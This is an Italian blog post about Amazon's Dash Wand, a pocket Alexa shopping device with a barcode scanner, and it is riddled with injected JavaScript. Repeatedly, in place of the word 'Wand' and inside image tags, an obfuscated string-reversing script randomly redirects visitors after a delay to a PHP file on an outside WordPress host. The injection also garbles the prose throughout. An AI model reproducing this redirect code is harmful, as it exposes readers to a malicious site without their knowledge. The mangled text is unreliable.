Da non perdere!

Dash Wandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and, il Compagno Tascabile di Amazon

Pubblicato il 10 luglio 2017
Condividi

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and-magnet.jpg” rel=”attachment wp-att-4528″>$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and-magnet.jpg” alt=”amazon dash wandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and” width=”1200″ height=”859″ />

La “Bacchetta Magica” che Gestisce la Propria Cucina.

Dopo l’Echo e l’Echo Show ecco arrivare sul mercato l’assistente personale tascabile con la funzione di commesso virtuale.

Il design è semplice ma intuitivo: si tratta di un dispositivo magnetico dotato di un pulsante che ne attiva le funzioni e di un foro posto a un’estremità per poterlo agganciare ovunque si desideri.

Eguagliandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando i suoi fratelli maggiori, il Dash Wandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and è interamente gestito da Alexa, il cervello artificiale di casa Amazon, con il compito di assistere i propri clienti nel momento in cui vorranno utilizzare le funzioni del dispositivo.

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.jpeg” rel=”attachment wp-att-4542″>$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.jpeg” alt=”amazon-dash-wandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and portatile” width=”500″ height=”500″ />

Compiti e funzionalità

Attraverso la semplice pressione del pulsante, si attiverà l’assistente virtuale. Dopo aver detto ciò che si vuole acquistare, Alexa si collegherà via wi-fi all’account personale di Amazon e velocizzerà l’acquisto dell’articolo dal vostro smartphone, permettendovi anche un acquisto diretto.

Ma il Dash Wandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and è più di una semplice macchina che permette di ridurre i tempi della spesa. Nel caso in cui si fosse insicuri di un acquisto, basterà chiamare in causa Alexa, che disporrà di un’ampia gamma di consigli pronti per il cliente.

Inoltre, se non si avessero idee su che cosa cucinare, l’assistente potrà fornirvi personalmente alcune ricette in base al personale interesse. Oppure, indicare un buon ristorante in zona dove trascorrere la serata.

Le innovazioni non finiscono qui perché la bacchetta magica dispone di un pratico lettore di codice a barre, attivabile sempre dallo stesso pulsante. Grazie a questo, sarà possibile scansionare i prodotti in esaurimento per un rifornimento rapido.


L’ultimo punto a favore del Dash Wandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and è il prezzo. L’oggetto costa 20 $, ma per incentivare le vendite Amazon ha deciso di rimborsare i propri clienti di tale spesa appena dopo l’acquisto numero uno sul portale tramite il dispositivo, rendendolo di fatto gratuito.

Anche per lui, bisognerà attenderne il lancio sul mercato italiano, non ancora annunciato dal colosso americano. Visto il successo dei propri oggetti hi-tech, non mancherà molto al primo contatto con nostro paese.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *